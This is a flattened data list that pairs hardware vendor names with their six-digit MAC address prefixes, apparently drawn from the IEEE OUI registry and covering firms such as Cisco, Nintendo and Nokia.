Multi Touch Oy 70704C Purple Communications, Inc D89760 C2 Development, Inc. F47ACC SolidFire, Inc. 905682 Lenbrook Industries Limited 50FC30 Treehouse Labs E467BA Danish Interpretation Systems A/S 903CAE Yunnan KSEC Digital Technology Co.,Ltd. 8CDE52 ISSC Technologies Corp. 082522 ADVANSEE 4C2F9D ICM Controls B467E9 Qingdao GoerTek Technology Co., Ltd. 581D91 Advanced Mobile Telecom co.,ltd. 1CB17F NEC Platforms, Ltd. 9CA134 Nike, Inc. 40BC8B itelio GmbH 48ED80 daesung eltec C80718 TDSi 186751 KOMEG Industrielle Messtechnik GmbH E42C56 Lilee Systems, Ltd. B89674 AllDSP GmbH & Co. KG 48E1AF Vity 6C9CED Cisco Systems, Inc 006BA0 SHENZHEN UNIVERSAL INTELLISYS PTE LTD A898C6 Shinbo Co., Ltd. B4211D Beijing GuangXin Technology Co., Ltd E843B6 QNAP Systems, Inc. E0DADC JVC KENWOOD Corporation E4AFA1 HES-SO A887ED ARC Wireless LLC D4D249 Power Ethernet 80427C Adolf Tedsen GmbH & Co. KG 409FC7 BAEKCHUN I&C Co., Ltd. 00FC58 WebSilicon Ltd. F0DA7C RLH INDUSTRIES,INC. AC319D Shenzhen TG-NET Botone Technology Co.,Ltd. 2486F4 Ctek, Inc. C4237A WhizNets Inc. B89BC9 SMC Networks Inc 989080 Linkpower Network System Inc Ltd. 186D99 Adanis Inc. F4E6D7 Solar Power Technologies, Inc. 20107A Gemtek Technology Co., Ltd. B87424 Viessmann Elektronik GmbH B451F9 NB Software 30168D ProLon 78DDD6 c-scape C09132 Patriot Memory 90185E Apex Tool Group GmbH & Co OHG F8FE5C Reciprocal Labs Corp A0E201 AVTrace Ltd.(China) 9CF67D Ricardo Prague, s.r.o. F82F5B eGauge Systems LLC 983571 Sub10 Systems Ltd 5404A6 ASUSTek COMPUTER INC. F83376 Good Mind Innovation Co., Ltd. 542018 Tely Labs 581FEF Tuttnaer LTD 58BDA3 Nintendo Co., Ltd. F8F25A G-Lab GmbH 4C0289 LEX COMPUTECH CO., LTD C0E54E ARIES Embedded GmbH 50F61A Kunshan JADE Technologies co., Ltd. 68F125 Data Controls Inc. BC764E Rackspace US, Inc. 3057AC IRLAB LTD. 98C845 PacketAccess F0DEB9 ShangHai Y&Y Electronics Co., Ltd 7CA61D MHL, LLC 842B50 Huria Co.,Ltd. 187C81 Valeo Vision Systems ACCC8E Axis Communications AB 582EFE Lighting Science Group 30F9ED Sony Corporation 84D32A IEEE 1905.1 8C94CF Encell Technology, Inc. 6CA780 Nokia Corporation CCC8D7 CIAS Elettronica srl E4A5EF TRON LINK ELECTRONICS CO., LTD. 705CAD Konami Gaming Inc 3C6F45 Fiberpro Inc. DCCE41 FE GLOBAL HONG KONG LIMITED FC6C31 LXinstruments GmbH B8BB6D ENERES Co.,Ltd. 14373B PROCOM Systems 1897FF TechFaith Wireless Technology Limited 4C5585 Hamilton Systems 8C8E76 taskit GmbH A0133B HiTi Digital, Inc. 9C5711 Feitian Xunda(Beijing) Aeronautical Information Technology Co., Ltd. 88F488 cellon communications technology(shenzhen)Co.,Ltd. 448E12 DT Research, Inc. 48F7F1 Nokia CC60BB Empower RF Systems 7CDD20 IOXOS Technologies S.A. ECF236 NEOMONTANA ELECTRONICS 0418B6 Private 703187 ACX GmbH 80971B Altenergy Power System,Inc. 30E4DB Cisco Systems, Inc ECEA03 DARFON LIGHTING CORP 587675 Beijing ECHO Technologies Co.,Ltd 0C51F7 CHAUVIN ARNOUX 0CFC83 Airoha Technology Corp., 3C26D5 Sotera Wireless E84E06 EDUP INTERNATIONAL (HK) CO., LTD 00077D Cisco Systems, Inc E0C922 Jireh Energy Tech., Ltd. 007F28 Actiontec Electronics, Inc 804731 Packet Design, Inc. F08BFE COSTEL.,CO.LTD B09BD4 GNH Software India Private Limited 3071B2 Hangzhou Prevail Optoelectronic Equipment Co.,LTD. 905F8D modas GmbH 98293F Fujian Start Computer Equipment Co.,Ltd 444F5E Pan Studios Co.,Ltd. D0AFB6 Linktop Technology Co., LTD 98EC65 Cosesy ApS 4C98EF Zeo 58E808 AUTONICS CORPORATION DC05ED Nabtesco Corporation 806CBC NET New Electronic Technology GmbH ACC935 Ness Corporation 008D4E CJSC NII STT B45CA4 Thing-talk Wireless Communication Technologies Corporation Limited 908D1D GH Technologies 00A1DE ShenZhen ShiHua Technology CO.,LTD 98F8DB Marini Impianti Industriali s.r.l. CCD9E9 SCR Engineers Ltd. 34A709 Trevil srl 6C391D Beijing ZhongHuaHun Network Information center 80B32A UK Grid Solutions Ltd B83D4E Shenzhen Cultraview Digital Technology Co.,Ltd Shanghai Branch 5087B8 Nuvyyo Inc C0EAE4 Sonicwall 0838A5 Funkwerk plettac electronic GmbH CC1EFF Metrological Group BV 184E94 MESSOA TECHNOLOGIES INC. 60F59C CRU-Dataport B0A72A Ensemble Designs, Inc. 6400F1 Cisco Systems, Inc F86971 Seibu Electric Co., 44AA27 udworks Co., Ltd. E8F928 RFTECH SRL C455A6 Cadac Holdings Ltd 5C7757 Haivision Network Video D4D898 Korea CNO Tech Co., Ltd B4AA4D Ensequence, Inc. 040A83 Alcatel-Lucent C45600 Galleon Embedded Computing 405539 Cisco Systems, Inc DCA7D9 Compressor Controls Corp 38FEC5 Ellips B.V. 1C955D I-LAX ELECTRONICS INC. 7465D1 Atlinks 909060 RSI VIDEO TECHNOLOGIES BC8199 BASIC Co.,Ltd. E0F211 Digitalwatt D0A311 Neuberger Gebäudeautomation GmbH 041D10 Dream Ware Inc. 801440 Sunlit System Technology Corp 88DD79 Voltaire 64F987 Avvasi Inc. 902E87 LabJack 180B52 Nanotron Technologies GmbH DC07C1 HangZhou QiYang Technology Co.,Ltd. A81B18 XTS CORP 58EECE Icon Time Systems 647FDA TEKTELIC Communications Inc. AC0613 Senselogix Ltd 747818 Jurumani Solutions B8F4D0 Herrmann Ultraschalltechnik GmbH & Co. Kg 08ACA5 Benu Video, Inc. 586D8F Cisco-Linksys, LLC C0A26D Abbott Point of Care 00BB8E HME Co., Ltd. D82A7E Nokia Corporation 801F02 Edimax Technology Co. Ltd. BC3E13 Accordance Systems Inc. FCF1CD OPTEX-FA CO.,LTD. 4425BB Bamboo Entertainment Corporation E00C7F Nintendo Co., Ltd. E48AD5 RF WINDOW CO., LTD. 443719 2 Save Energy Ltd 84EA99 Vieworks 10E3C7 Seohwa Telecom BCC61A SPECTRA EMBEDDED SYSTEMS 0470BC Globalstar Inc. D85D84 CAx soft GmbH D4E32C S. Siedle & Sohne 942053 Nokia Corporation FC3598 Favite Inc. 90D92C HUG-WITSCHI AG A424B3 FlatFrog Laboratories AB 94CDAC Creowave Oy 7CDA84 Dongnian Networks Inc. 28852D Touch Networks 988E34 ZHEJIANG BOXSAM ELECTRONIC CO.,LTD C471FE Cisco Systems, Inc 989449 Skyworth Wireless Technology Ltd. 2CA157 acromate, Inc. 7C6ADB SafeTone Technology Co.,Ltd 144C1A Max Communication GmbH 643409 BITwave Pte Ltd 74CD0C Smith Myers Communications Ltd. CCCE40 Janteq Corp B8EE79 YWire Technologies, Inc. 4037AD Macro Image Technology, Inc. 28ED58 JAG Jakob AG B8797E Secure Meters (UK) Limited 2005E8 OOO InProMedia B0B32B Slican Sp. z o.o. 5842E4 Baxter International Inc CC9E00 Nintendo Co., Ltd. 58A76F iD corporation 0006F6 Cisco Systems, Inc 747DB6 Aliwei Communications, Inc B06563 Shanghai Railway Communication Factory AC6F4F Enspert Inc 6C2E33 Accelink Technologies Co.,Ltd. 40987B Aisino Corporation BC38D2 Pandachip Limited B8BA68 Xi'an Jizhong Digital Communication Co.,Ltd 9CF938 AREVA NP GmbH 8CDB25 ESG Solutions 4022ED Digital Projection Ltd 4018D7 Smartronix, Inc. 4C2C80 Beijing Skyway Technologies Co.,Ltd D49E6D Wuhan Zhongyuan Huadian Science & Technology Co., 340804 D-Link Corporation F05D89 Dycon Limited F00248 SmarteBuilding 486B91 Fleetwood Group Inc. E82877 TMY Co., Ltd. F0C88C LeddarTech Inc. 40C245 Shenzhen Hexicom Technology Co., Ltd. CC55AD RIM E8757F FIRS Technologies(Shenzhen) Co., Ltd F0F7B3 Phorm 00D38D Hotel Technology Next Generation C83EA7 KUNBUS GmbH 6063FD Transcend Communication Beijing Co.,Ltd. 74BE08 ATEK Products, LLC 74D675 WYMA Tecnologia B40EDC LG-Ericsson Co.,Ltd. E0EE1B Panasonic Automotive Systems Company of America 8497B8 Memjet Inc. A0DDE5 SHARP Corporation 206AFF Atlas Elektronik UK Limited 74A4A7 QRS Music Technologies, Inc. 40CD3A Z3 Technology 482CEA Motorola Inc Business Light Radios 9088A2 IONICS TECHNOLOGY ME LTDA 00336C SynapSense Corporation 100C24 pomdevices, LLC 58F6BF Kyoto University AC6123 Drivven, Inc. F866F2 Cisco Systems, Inc AC34CB Shanhai GBCOM Communication Technology Co. Ltd D8B6C1 NetworkAccountant, Inc. 60893C Thermo Fisher Scientific P.O.A. D86BF7 Nintendo Co., Ltd. 145412 Entis Co., Ltd. 78EC22 Shanghai Qihui Telecom Technology Co., LTD 0C15C5 SDTEC Co., Ltd. F8FB2F Santur Corporation F455E0 Niceway CNC Technology Co.,Ltd.Hunan Province 20FDF1 3COM EUROPE LTD A4218A Nortel Networks FC75E6 Handreamnet EC2368 IntelliVoice Co.,Ltd. 749050 Renesas Electronics Corporation 7CEF18 Creative Product Design Pty. Ltd. C00D7E Additech, Inc. 84C7A9 C3PO S.A. 609AA4 GVI SECURITY INC. 641084 HEXIUM Technical Development Co., Ltd. 6C626D Micro-Star INT'L CO., LTD 64995D LGE FC7CE7 FCI USA LLC 700258 01DB-METRAVIB 342109 Jensen Scandinavia AS 2CCD43 Summit Technology Group 244597 GEMUE Gebr. Mueller Apparatebau 78818F Server Racks Australia Pty Ltd 284846 GridCentric Inc. 30694B RIM 10CCDB AXIMUM PRODUITS ELECTRONIQUES 38C7BA CS Services Co.,Ltd. EC5C69 MITSUBISHI HEAVY INDUSTRIES MECHATRONICS SYSTEMS,LTD. 6C92BF Inspur Electronic Information Industry Co.,Ltd. ECFE7E BlueRadios, Inc. E4AD7D SCL Elements F09CBB RaonThink Inc. 80EE73 Shuttle Inc. FCE23F CLAY PAKY SPA 58570D Danfoss Solar Inverters D87157 Lenovo Mobile Communication Technology Ltd. 7C3E9D PATECH C4823F Fujian Newland Auto-ID Tech. Co,.Ltd. E85B5B LG ELECTRONICS INC BCA9D6 Cyber-Rain, Inc. 3C106F ALBAHITH TECHNOLOGIES 28068D ITL, LLC 8C541D LGE 00A2DA INAT GmbH 6C3E9C KE Knestel Elektronik GmbH 8CD628 Ikor Metering 243C20 Dynamode Group 481BD2 Intron Scientific co., ltd. 30EFD1 Alstom Strongwish (Shenzhen) Co., Ltd. D41F0C JAI Manufacturing 7C2CF3 Secure Electrans Ltd 081651 SHENZHEN SEA STAR TECHNOLOGY CO.,LTD 304174 ALTEC LANSING LLC A863DF DISPLAIRE CORPORATION 183BD2 BYD Precision Manufacture Company Ltd. 4CC602 Radios, Inc. 3C39C3 JW Electronics Co., Ltd. 3C05AB Product Creation Studio D0F0DB Ericsson 7C1476 Damall Technologies SAS F04335 DVN(Shanghai)Ltd. A479E4 KLINFO Corp B45861 CRemote, LLC B0973A E-Fuel Corporation 204E6B Axxana(israel) ltd E497F0 Shanghai VLC Technologies Ltd. Co. 44A8C2 SEWOO TECH CO., LTD 003CC5 WONWOO Engineering Co., Ltd F077D0 Xcellen B40832 TC Communications 88FD15 LINEEYE CO., LTD 884B39 Siemens AG, Healthcare Sector D828C9 General Electric Consumer and Industrial 44C233 Guangzhou Comet Technology Development Co.Ltd E43593 Hangzhou GoTo technology Co.Ltd 80B289 Forworld Electronics Ltd. E83A97 Toshiba Corporation 1056CA Peplink International Ltd. D49C28 JayBird LLC 486FD2 StorSimple Inc A03A75 PSS Belgium N.V. 00DB45 THAMWAY CO.,LTD. C8D1D1 AGAiT Technology Corporation 040EC2 ViewSonic Mobile China Limited 24DBAD ShopperTrak RCT Corporation 2872C5 Smartmatic Corp 2C3A28 Fagor Electrónica 80F593 IRCO Sistemas de Telecomunicación S.A. 003A9C Cisco Systems, Inc ECDE3D Lamprey Networks, Inc. 6CFFBE MPB Communications Inc. 9CEBE8 BizLink (Kunshan) Co.,Ltd 74F726 Neuron Robotics 64168D Cisco Systems, Inc 7C6C8F AMS NEVE LTD 9CB206 HMS Industrial Networks ACE9AA Hay Systems Ltd 082AD0 SRD Innovations Inc. E08FEC REPOTEC CO., LTD. 889821 TERAON E0E751 Nintendo Co., Ltd. 74F07D BnCOM Co.,Ltd 88ED1C Cudo Communication Co., Ltd. 9CCD82 CHENG UEI PRECISION INDUSTRY CO.,LTD 003AAF BlueBit Ltd. F852DF VNL Europe AB 5CE223 Delphin Technology AG F871FE The Goldman Sachs Group, Inc. D8C3FB DETRACOM A8CB95 EAST BEST CO., LTD. F45FF7 DQ Technology Inc. F06281 ProCurve Networking by HP C09C92 COBY C038F9 Nokia Danmark A/S F46349 Diffon Corporation 2C1984 IDN Telecom, Inc. 40EF4C Fihonest communication co.,Ltd 00271E Xagyl Communications 00271D Comba Telecom Systems (China) Ltd. 002720 NEW-SOL COM 002708 Nordiag ASA 002702 SolarEdge Technologies 0026FA BandRich Inc. 0026F9 S.E.M. srl 0026FD Interactive Intelligence 7C3BD5 Imago Group 644F74 LENUS Co., Ltd. 787F62 GiK mbH C4FCE4 DishTV NZ Ltd 401597 Protect America, Inc. E80B13 Akib Systems Taiwan, INC 58F67B Xia Men UnionCore Technology LTD. 002711 LanPro Inc EC6C9F Chengdu Volans Technology CO.,LTD 0026F7 Nivetti Systems Pvt. Ltd. 0026F6 Military Communication Institute 0026F0 cTrixs International GmbH. 0026EA Cheerchip Electronic Technology (ShangHai) Co., Ltd. 00268F MTA SpA 002686 Quantenna Communcations, Inc. 002684 KISAN SYSTEM 002680 SIL3 Pty.Ltd 0026D5 Ory Solucoes em Comercio de Informatica Ltda. 0026CE Kozumi USA Corp. 0026CA Cisco Systems, Inc 0026C9 Proventix Systems, Inc. 0026BF ShenZhen Temobi Science&Tech Development Co.,Ltd 0026B4 Ford Motor Company 0026DD Fival Science & Technology Co.,Ltd. 0026DE FDI MATELEC 0026DA Universal Media Corporation /Slovakia/ s.r.o. 0026DB Ionics EMS Inc. 0026AC Shanghai LUSTER Teraband photonic Co., Ltd. 0026A6 TRIXELL 002694 Senscient Ltd 002690 I DO IT 002679 Euphonic Technologies, Inc. 002676 COMMidt AS 002666 EFM Networks 002657 OOO NPP EKRA 002601 Cutera Inc 0025F6 netTALK.com, Inc. 0025F5 DVS Korea, Co., Ltd 0025EB Reutech Radar Systems (PTY) Ltd 0025EE Avtex Ltd 0025B9 Cypress Solutions Inc 0025B6 Telecom FM 0025AE Microsoft Corporation 0025AF COMFILE Technology 0025A8 Kontron (BeiJing) Technology Co.,Ltd 0025A5 Walnut Media Network 0025A4 EuroDesign embedded technologies GmbH 00262B Wongs Electronics Co. Ltd. 002620 ISGUS GmbH 00261D COP SECURITY SYSTEM CORP. 002638 Xia Men Joyatech Co., Ltd. 00263A Digitec Systems 002635 Bluetechnix GmbH 002617 OEM Worldwide 002613 Engel Axil S.L. 00260F Linn Products Ltd 00260C Dataram 0025D6 The Kroger Co. 0025D1 Eastern Asia Technology Limited 0025CD Skylane Optics 0025D9 DataFab Systems Inc. 0025C1 Nawoo Korea Corp. 0025BF Wireless Cables Inc. 002652 Cisco Systems, Inc 00258C ESUS ELEKTRONIK SAN. VE DIS. TIC. LTD. STI. 002587 Vitality, Inc. 00257A CAMCO Produktions- und Vertriebs-GmbH für Beschallungs- und Beleuchtungsanlagen 002576 NELI TECHNOLOGIES 002574 KUNIMI MEDIA DEVICE Co., Ltd. 002573 ST Electronics (Info-Security) Pte Ltd 00256F Dantherm Power 002540 Quasar Technologies, Inc. 002533 WITTENSTEIN AG 002530 Aetas Systems Inc. 00252C Entourage Systems, Inc. 00252F Energy, Inc. 00250F On-Ramp Wireless, Inc. 002505 eks Engel GmbH & Co. KG 00250A Security Expert Co. Ltd 00255A Tantalus Systems Corp. 002559 Syphan Technologies Ltd 002554 Pixel8 Networks 002523 OCP Inc. 00251D DSA Encore, LLC 00246D Weinzierl Engineering GmbH 00246A Solid Year Co., Ltd. 002467 AOC International (Europe) GmbH 002492 Motorola, Broadband Solutions Group 002484 Bang and Olufsen Medicom a/s 002480 Meteocontrol GmbH 00247A FU YI CHENG Technology Co., Ltd. 002476 TAP.tv 0024D8 IlSung Precision 0024CD Willow Garage, Inc. 0024D3 QUALICA Inc. 0024CE Exeltech Inc 0024CF Inscape Data Corporation 0024C6 Hager Electro SAS 002509 SHARETRONIC Group LTD 0024FD Accedian Networks Inc 00249C Bimeng Comunication System Co. Ltd 002498 Cisco Systems, Inc 00248B HYBUS CO., LTD. 0024B4 ESCATRONIC GmbH 0024B1 Coulomb Technologies 0024DA Innovar Systems Limited 0024F5 NDS Surgical Imaging 002453 Initra d.o.o. 00244C Solartron Metrology Ltd 002448 SpiderCloud Wireless, Inc 00244B PERCEPTRON INC 002442 Axona Limited 0023CA Behind The Set, LLC 0023CB Shenzhen Full-join Technology Co.,Ltd 0023D0 Uniloc USA Inc. 0023C7 AVSystem sp. z o. o. 0023C3 LogMeIn, Inc. 0023E1 Cavena Image Products AB 0023DC Benein, Inc 0023D1 TRG 0023D3 AirLink WiFi Networking Corp. 002417 Thomson Telecom Belgium 002416 Any Use 002409 The Toro Company 00245E Hivision Co.,ltd 00244D Hokkaido Electronics Corporation 002452 Silicon Software GmbH 00242A Hittite Microwave Corporation 002422 Knapp Logistik Automation GmbH 00241B iWOW Communications Pte Ltd 002428 EnergyICT 002406 Pointmobile 002400 Nortel Networks 0023FB IP Datatel, LLC. 0023FE Biodevices, SA 0023F4 Masternaut 00243C S.A.A.A. 002343 TEM AG 002336 METEL s.r.o. 002338 OJ-Electronics A/S 00233B C-Matic Systems Ltd 002372 MORE STAR INDUSTRIAL GROUP LIMITED 00236D ResMed Ltd 00236B Xembedded, Inc. 002361 Unigen Corporation 00232C Senticare 00232B IRD A/S 00232A eonas IT-Beratung und -Entwicklung GmbH 002327 Shouyo Electronics CO., LTD 002328 ALCON TELECOMMUNICATIONS CO., LTD. 0023AD Xmark Corporation 0023AB Cisco Systems, Inc 0023A4 New Concepts Development Corp. 002385 ANTIPODE 00237E ELSTER GMBH 00237C NEOTION 00237A RIM 00235F Silicon Micro Sensors GmbH 00234C KTC AB 00231A ITF Co., Ltd. 00230D Nortel Networks 0023B0 COMXION Technology Inc. 002303 LITE-ON IT Corporation 0022FE Advanced Illumination 002300 Cayee Computer Ltd. 0022F3 SHARP Corporation 0022F6 Syracuse Research Corporation 0022ED TSI Power Corporation 0022E1 ZORT Labs, LLC. 0022E0 Atlantic Software Technologies S.r.L. 0022DF TAMUZ Monitors 0022D8 Shenzhen GST Security and Safety Technology Limited 0022DC Vigil Health Solutions Inc. 0022D9 Fortex Industrial Ltd. 0022D3 Hub-Tech 0022D4 ComWorth Co., Ltd. 00228C Photon Europe GmbH 00228B Kensington Computer Products Group 00228D GBS Laboratories LLC 002289 Vanderlande APC inc. 00229F Sensys Traffic AB 002299 SeaMicro Inc. 0022C9 Lenord, Bauer & Co GmbH 0022AA Nintendo Co., Ltd. 0022A8 Ouman Oy 00227D YE DATA INC. 00227B Apogee Labs, Inc. 0022BC JDSU France SAS 00221C Private 002222 Schaffner Deutschland GmbH 002223 TimeKeeping Systems, Inc. 00221A Audio Precision 002218 AKAMAI TECHNOLOGIES INC 002213 PCI CORPORATION 00224C Nintendo Co., Ltd. 00224A RAYLASE AG 00224B AIRTECH TECHNOLOGIES, INC. 00223C RATIO Entwicklungen GmbH 00226D Shenzhen GIEC Electronics Co., Ltd. 00226E Gowell Electronic Limited 00225D Digicable Network India Pvt. Ltd. 002256 Cisco Systems, Inc 002252 ZOLL Lifecor Corporation 00224D MITAC INTERNATIONAL CORP. 0021D8 Cisco Systems, Inc 0021D7 Cisco Systems, Inc 0021D9 SEKONIC CORPORATION 0021DA Automation Products Group Inc. 0021E3 SerialTek LLC 0021E7 Informatics Services Corporation 0021DC TECNOALARM S.r.l. 0021F8 Enseo, Inc. 0021F3 Si14 SpA 0021F1 Tutus Data AB 002231 SMT&C Co., Ltd. 002201 Aksys Networks Inc 00215F IHSE GmbH 002156 Cisco Systems, Inc 002151 Millinet Co., Ltd. 002147 Nintendo Co., Ltd. 002149 China Daheng Group ,Inc. 002122 Chip-pro Ltd. 002125 KUK JE TONG SHIN Co.,LTD 002126 Shenzhen Torch Equipment Co., Ltd. 00211C Cisco Systems, Inc 002118 Athena Tech, Inc. 0021A7 Hantle System Co., Ltd. 00219C Honeywld Technology Corp. 00219A Cambridge Visual Networks Ltd 002171 Wesung TNC Co., Ltd. 00216C ODVA 002161 Yournet Inc. 002193 Videofon MV 002192 Baoding Galaxy Electronic Technology Co.,Ltd 002189 AppTech, Inc. 0021C4 Consilium AB 0021BD Nintendo Co., Ltd. 0021B5 Galvanic Ltd 00217B Bastec AB 002176 YMax Telecom Ltd. 002135 ALCATEL-LUCENT 002138 Cepheid 001FBD Kyocera Wireless Corp. 001FB9 Paltronics 001FB7 WiMate Technologies Corp. 001FB4 SmartShare Systems 001FB6 Chi Lin Technology Co., Ltd. 001FAF NextIO, Inc. 001F84 Gigle Semiconductor 001F7B TechNexion Ltd. 001F7D Embedded Wireless GmbH 001FAA Taseon, Inc. 001F9E Cisco Systems, Inc 001FA0 A10 Networks 001FF9 Advanced Knowledge Associates 001FF4 Power Monitors, Inc. 001F8D Ingenieurbuero Stark GmbH und Ko. KG 001F8F Shanghai Bellmann Digital Source Co.,Ltd. 001FED Tecan Systems Inc. 001FE5 In-Circuit GmbH 001FC5 Nintendo Co., Ltd. 001FC0 Control Express Finland Oy 001FBC EVGA Corporation 002113 Padtec S/A 002112 WISCOM SYSTEM CO.,LTD 00210E Orpak Systems L.T.D. 001EE6 Shenzhen Advanced Video Info-Tech Co., Ltd. 001ED8 Digital United Inc. 001ED6 Alentec & Orion AB 001F0E Japan Kyastem Co., Ltd 001F0B Federal State Unitary Enterprise Industrial Union"Electropribor" 001F0C Intelligent Digital Services GmbH 001EF7 Cisco Systems, Inc 001F57 Phonik Innovation Co.,LTD 001F59 Kronback Tracers 001F4E ConMed Linvatec 001F4A Albentia Systems S.A. 001F74 Eigen Development 001F75 GiBahn Media 001F6E Vtech Engineering Corporation 001F66 PLANAR LLC 001F5F Blatand GmbH 001F28 HPN Supply Chain 001F1E Astec Technology Co., Ltd 001F14 NexG 001F08 RISCO LTD 001EF1 Servimat 001EF4 L-3 Communications Display Systems 001EF5 Hitek Automated Inc. 001F43 ENTES ELEKTRONIK 001E9C Fidustron INC 001E97 Medium Link System Technology CO., LTD, 001E8B Infra Access Korea Co., Ltd. 001E3F TrellisWare Technologies, Inc. 001E34 CryptoMetrics 001E2D STIM 001E85 Lagotek Corporation 001E77 Air2App 001E7B R.I.CO. S.r.l. 001EB3 Primex Wireless 001EB6 TAG Heuer SA 001EAC Armadeus Systems 001EAA E-Senza Technologies GmbH 001EC6 Obvius Holdings LLC 001EC4 Celio Corp 001EC1 3COM EUROPE LTD 001EBB BLUELIGHT TECHNOLOGY INC. 001EB5 Ever Sparkle Technologies Ltd 001E55 COWON SYSTEMS,Inc. 001E56 Bally Wulff Entertainment GmbH 001E57 ALCOMA, spol. s r.o. 001E50 BATTISTONI RESEARCH 001E11 ELELUX INTERNATIONAL LTD 001DFC KSIC 001E41 Microwave Communication & Component, Inc. 001E6E Shenzhen First Mile Communications Ltd 001E6D IT R&D Center 001DF2 Netflix, Inc. 001DEF TRIMM, INC. 001DF1 Intego Systems, Inc. 001DED Grid Net, Inc. 001D80 Beijing Huahuan Eletronics Co.,Ltd 001D83 Emitech Corporation 001D74 Tianjin China-Silicon Microelectronics Co., Ltd. 001DC3 RIKOR TV, Ltd 001DC1 Audinate Pty L 001DB2 HOKKAIDO ELECTRIC ENGINEERING CO.,LTD. 001DAD Sinotech Engineering Consultants, Inc. Geotechnical Enginee 001DAB SwissQual License AG 001DD8 Microsoft Corporation 001DC8 Navionics Research Inc., dba SCADAmetrics 001DCC Ayon Cyber Security, Inc 001D6D Confidant International LLC 001D7C ABE Elettronica S.p.A. 001D75 Radioscape PLC 001D92 MICRO-STAR INT'L CO.,LTD. 001D8A TechTrex Inc 001DA0 Heng Yu Electronic Manufacturing Company Limited 001D87 VigTech Labs Sdn Bhd 001D5F OverSpeed SARL 001D58 CQ Inc 001D53 S&O Electronics (Malaysia) Sdn. Bhd. 001D54 Sunnic Technology & Merchandise INC. 001D4B Grid Connect Inc. 001D4D Adaptive Recognition Hungary, Inc 001CED ENVIRONNEMENT SA 001CE5 MBS Electronic Systems GmbH 001CFF Napera Networks Inc 001CC2 Part II Research, Inc. 001CBD Ezze Mobile Tech., Inc. 001CDD COWBELL ENGINEERING CO., LTD. 001CDC Custom Computer Services, Inc. 001CD1 Waves Audio LTD 001D1D Inter-M Corporation 001D0E Agapha Technology co., Ltd. 001D0A Davis Instruments, Inc. 001D05 Cooper Lighting Solutions 001D2F QuantumVision Corporation 001C55 Shenzhen Kaifa Technology Co. 001C44 Bosch Security Systems BV 001C4C Petrotest Instruments 001C3C Seon Design Inc. 001C29 CORE DIGITAL ELECTRONICS CO., LTD 001C24 Formosa Wireless Systems Corp. 001C20 CLB Benelux 001C1C Center Communication Systems GmbH 001C15 iPhotonix LLC 001C57 Cisco Systems, Inc 001C5D Leica Microsystems 001C5E ASTON France 001C5B Chubb Electronic Security Systems Ltd 001C31 Mobile XP Technology Co., LTD 001C34 HUEY CHIAO INTERNATIONAL CO., LTD. 001C36 iNEWiT NV 001C79 Cohesive Financial Technologies LLC 001C6D KYOHRITSU ELECTRONIC INDUSTRY CO., LTD. 001C64 Landis+Gyr 001C07 Cwlinux Limited 001C00 Entry Point, LLC 001BFD Dignsys Inc. 001CB8 CBC Co., Ltd 001CBA VerScient, Inc. 001CB0 Cisco Systems, Inc 001CAC Qniq Technology Corp. 001C8B MJ Innovations Ltd. 001C82 Genew Technologies 001C84 STL Solution Co.,Ltd. 001CA5 Zygo Corporation 001C9D Liecthi AG 001C96 Linkwise Technology Pte Ltd 001BE2 AhnLab,Inc. 001BE0 TELENOT ELECTRONIC GmbH 001BDA UTStarcom Inc 001BD1 SOGESTMATIC 001BBD FMC Kongsberg Subsea AS 001BBE ICOP Digital 001BB3 Condalo GmbH 001BB7 Alta Heights Technology Corp. 001BAC Curtiss Wright Controls Embedded Computing 001B99 KS System GmbH 001B9A Apollo Fire Detectors Ltd 001B8C JMicron Technology Corp. 001B91 EFKON AG 001B89 EMZA Visual Sense Ltd. 001BA3 Flexit Group GmbH 001B9F Calyptech Pty Ltd 001B8B NEC Platforms, Ltd. 001B82 Taiwan Semiconductor Co., Ltd. 001B85 MAN Energy Solutions 001B67 Cisco Systems Inc 001B66 Sennheiser electronic GmbH & Co. KG 001B60 NAVIGON AG 001BF5 Tellink Sistemas de Telecomunicación S.L. 001BE6 VR AG 001BD6 Kelvin Hughes Ltd 001BCF Dataupia Corporation 001BCB PEMPEK SYSTEMS PTY LTD 001B7B The Tintometer Ltd 001B75 Hypermedia Systems 001B6A Powerwave Technologies Sweden AB 001AE6 Atlanta Advanced Communications Holdings Limited 001AD9 International Broadband Electric Communications, Inc. 001B29 Avantis.Co.,Ltd 001B28 POLYGON, JSC 001B2B Cisco Systems, Inc 001B27 Merlin CSI 001B1B Siemens AG, 001B1F FORCE Technology 001B0E InoTec GmbH Organisationssysteme 001B04 Affinity International S.p.a 001B06 Ateliers R. LAUMONIER 001B05 YMC AG 001AFF Wizyoung Tech. 001B00 Neopost Technologies 001B57 SEMINDIA SYSTEMS PRIVATE LIMITED 001B55 Hurco Automation Ltd. 001B53 Cisco Systems, Inc 001B49 Roberts Radio limited 001B4E Navman New Zealand 001B43 Beijing DG Telecommunications equipment Co.,Ltd 001B3C Software Technologies Group,Inc. 001B3D EuroTel Spa 001B31 Neural Image. Co. Ltd. 001AC8 ISL (Instrumentation Scientifique de Laboratoire) 001B16 Celtro Ltd. 001AC6 Micro Control Designs 001AF2 Dynavisions Schweiz AG 001A56 ViewTel Co,. Ltd. 001A50 PheeNet Technology Corp. 001A53 Zylaya 001A4C Crossbow Technology, Inc 001A42 Techcity Technology co., Ltd. 001A7D cyber-blue(HK)Ltd 001A82 PROBA Building Automation Co.,LTD 001A7C Hirschmann Multimedia B.V. 001A7A Lismore Instruments Limited 001A61 PacStar Corp. 001A65 Seluxit 001A54 Hip Shing Electronics Ltd. 001A60 Wave Electronics Co.,Ltd. 001A78 ubtos 001A76 SDT information Technology Co.,LTD. 001A70 Cisco-Linksys, LLC 001AAF BLUSENS TECHNOLOGY 001AB0 Signal Networks Pvt. Ltd., 001AA1 Cisco Systems, Inc 001AAB eWings s.r.l. 001AAC Corelatus AB 0019F8 Embedded Systems Design, Inc. 0019EF SHENZHEN LINNKING ELECTRONICS CO.,LTD 0019F3 Cetis, Inc 0019F5 Imagination Technologies Ltd 0019F7 Onset Computer Corporation 0019EE CARLO GAVAZZI CONTROLS SPA-Controls Division 0019EB Pyronix Ltd 0019E7 Cisco Systems, Inc 0019E9 S-Information Technolgy, Co., Ltd. 0019DA Welltrans O&E Technology Co. , Ltd. 0019D0 Cathexis 0019D6 LS Cable and System Ltd. 0019D7 FORTUNETEK CO., LTD 0019C9 S&C ELECTRIC COMPANY 0019BF Citiway technology Co.,ltd 0019B6 Euro Emme s.r.l. 0019B5 Famar Fueguina S.A. 0019B8 Boundary Devices 001A12 Essilor 001A14 Xin Hua Control Engineering Co.,Ltd. 001A10 LUCENT TRANS ELECTRONICS CO.,LTD 